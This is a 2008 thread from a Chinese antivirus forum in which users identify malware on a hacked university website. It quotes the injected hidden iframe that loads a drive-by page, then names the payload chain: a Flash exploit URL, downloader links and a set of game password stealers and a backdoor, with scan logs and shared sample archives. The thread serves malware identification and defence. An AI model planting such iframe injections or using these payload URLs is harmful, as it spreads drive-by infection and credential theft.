查看: 3059|回复: 9
收起左侧

[已鉴定] IE进去就卡死...

 关闭 [复制链接]
loveyuwei
发表于 2008-6-25 12:51:53 | 显示全部楼层 |阅读模式
http://218.197.80.7/index.asp

RT,源文件里面加入了这个。

<!-- 加载函数文件 -->
  <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<iFrame src="http://yiduanEr.cn/pagE/rnb.htm?mor" wiDth=100 name='7780' hEight=0></iframE>
<!-- 加载函数文件完毕 -->

红伞应该会狂报的,但是我的KIS2009没反应。

ssy275
发表于 2008-6-25 12:59:57 | 显示全部楼层
FIREFOX进去无反应
电影结束了
发表于 2008-6-25 13:10:45 | 显示全部楼层
http://jasonhuk.62mf.cn/ma/1.swf
SWF:CVE-2007-0071 [Expl]
Exploit
080625-0, 2008-06-25

[ 本帖最后由 电影结束了 于 2008-6-25 13:18 编辑 ]

swf.rar

1.49 KB, 下载次数: 60

shery0000
发表于 2008-6-25 13:21:00 | 显示全部楼层

swf.rar

651.17 KB, 下载次数: 101

DOWNLOADER.rar

450.83 KB, 下载次数: 104

电影结束了
发表于 2008-6-25 13:24:54 | 显示全部楼层
F:\DOWNLOADER.rar>>DOWNLOADER\Baidu.exe                Trojan.Cap85254.jtuo                  木马
F:\DOWNLOADER.rar>>DOWNLOADER\bak.css                  TrojanDownloader.Nurech.bd.bmqk       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys1.exe                 W32.Small.NDW.akkb                    病毒
F:\DOWNLOADER.rar>>DOWNLOADER\sys10.exe                TrojanPSW.OnLineGames.wlu.kjdk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys11.exe                TrojanSpy.Gen.oili                    木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys12.exe                TrojanPSW.OnLineGames.urs.adgq        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys13.exe                TrojanPSW.OnLineGames.urs.xjnk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys14.exe                Trojan.Cap862122.tlas                 木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys15.exe                TrojanPSW.OnLineGames.aphm.xnnu       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys16.exe                TrojanPSW.OnLineGames.aphm.ofoe       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys17.exe                Trojan.Cap86250.lpfs                  木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys18.exe                Trojan.Cap86144.hbow                  木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys19.exe                TrojanPSW.OnLineGames.wlu.kjdk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys2.exe                 TrojanDownloader.Nurech.bd.bmqk       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys20.exe                TrojanPSW.OnLineGames.urs.jlpi        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys21.exe                TrojanPSW.GameOL.odt.vhxn             木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys22.exe                Trojan.Cap86250.zaex                  木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys23.exe                TrojanPSW.OnLineGames.urs.wkrk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys24.exe                TrojanPSW.OnLineGames.wlu.kjdk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys25.exe                W32.Small.NDW.akkb                    病毒
F:\DOWNLOADER.rar>>DOWNLOADER\sys3.exe                 TrojanPSW.OnLineGames.wlu.kjdk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys4.exe                 TrojanPSW.OnLineGames.apms.dsel       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys5.exe                 Trojan.Cap861416.cnsi                 木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys6.exe                 TrojanPSW.OnLineGames.ascd.qtck       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys7.exe                 TrojanPSW.GameOL.odt.scch             木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys8.exe                 TrojanDownloader.Agent.udh.esdx       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys9.exe                 TrojanPSW.GameOL.odt.nimj             木马
冷冷
发表于 2008-6-25 14:30:39 | 显示全部楼层
---》hXXp://user1.12-27.net/bak.css
---》hXXp://jasonhuk.62mf.cn/ma/1.exe
mofunzone
发表于 2008-6-25 14:53:28 | 显示全部楼层
清空
Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\swf(2)'
C:\Documents and Settings\morgan\My Documents\swf(2)\
  1.swf
      [DETECTION] Contains detection pattern of the exploits EXP/Flash.Gen
      [NOTE]      The file was deleted!
C:\Documents and Settings\morgan\My Documents\swf(2)\DOWNLOADER\
  Baidu.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Agent.qqb.1
      [NOTE]      The file was deleted!
  bak.css
      [DETECTION] Is the Trojan horse TR/Dldr.Agent.rqj.1
      [NOTE]      The file was deleted!
  sys1.exe
      [DETECTION] Is the Trojan horse TR/Agent.nbj
      [NOTE]      The file was deleted!
  sys10.exe
    [0] Archive type: Runtime Packed
    --> Object
      [NOTE]      The file was deleted!
  sys11.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys12.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys13.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys14.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys15.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys16.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys17.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys18.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys19.exe
    [0] Archive type: Runtime Packed
    --> Object
      [NOTE]      The file was deleted!
  sys2.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
          [2] Archive type: RSRC
          --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys20.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys21.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys22.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys23.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys24.exe
    [0] Archive type: Runtime Packed
    --> Object
      [NOTE]      The file was deleted!
  sys25.exe
      [DETECTION] Is the Trojan horse TR/Agent.NBJ.1
      [NOTE]      The file was deleted!
  sys3.exe
    [0] Archive type: Runtime Packed
    --> Object
      [NOTE]      The file was deleted!
  sys4.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys5.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys6.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys7.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys8.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
          [2] Archive type: Runtime Packed
          --> Object
        --> Object
            [DETECTION] Is the Trojan horse TR/Dldr.Small.xpd
            [WARNING]   Infected files in archives cannot be repaired!
        --> Object
      [DETECTION] File has been compressed with an unusual runtime compression tool (PCK/UPACK). Please verify the origin of the file
      [NOTE]      The file was deleted!
  sys9.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
C:\Documents and Settings\morgan\My Documents\swf(2)\swf\
  1.exe
      [DETECTION] Contains a detection pattern of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [NOTE]      The file was deleted!
  1.swf
      [DETECTION] Contains detection pattern of the exploits EXP/Flash.Gen
      [NOTE]      The file was deleted!


End of the scan: 2008年6月24日  23:53
Used time: 00:06 min

The scan has been done completely.

      3 Scanning directories
     30 Files were scanned
     31 viruses and/or unwanted programs were found
      0 Files were classified as suspicious:
     30 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
     -1 Files not concerned
      0 Archives were scanned
      1 Warnings
     30 Notes
wangjay1980
发表于 2008-6-25 21:01:47 | 显示全部楼层
TO KL
屏幕截图00716.png
qigang
发表于 2008-6-25 21:39:18 | 显示全部楼层

63/26

瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.Win32.Undef.gzb   
病毒: RootKit.Win32.Undef.jc   
病毒: Trojan.PSW.Win32.ZhuXian.hx
病毒: Trojan.PSW.Win32.ZeroOnline.dv
病毒: Trojan.PSW.Win32.GameOL.odt
病毒: Trojan.Win32.KillAV.abc  
病毒: Trojan.DL.Win32.Mnless.ala
病毒: Trojan.PSW.Win32.GameOL.oci
病毒: Trojan.PSW.Win32.GameOL.ogc
病毒: Trojan.PSW.Win32.RocOnline.lf
病毒: Trojan.PSW.Win32.GameOL.ofr
病毒: Trojan.DL.Win32.Small.vtg
病毒: Trojan.DL.Win32.Mnless.afz

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.50.22
markrhy
发表于 2008-6-28 16:54:54 | 显示全部楼层
红伞杀!!!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-16 23:26 , Processed in 0.135084 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表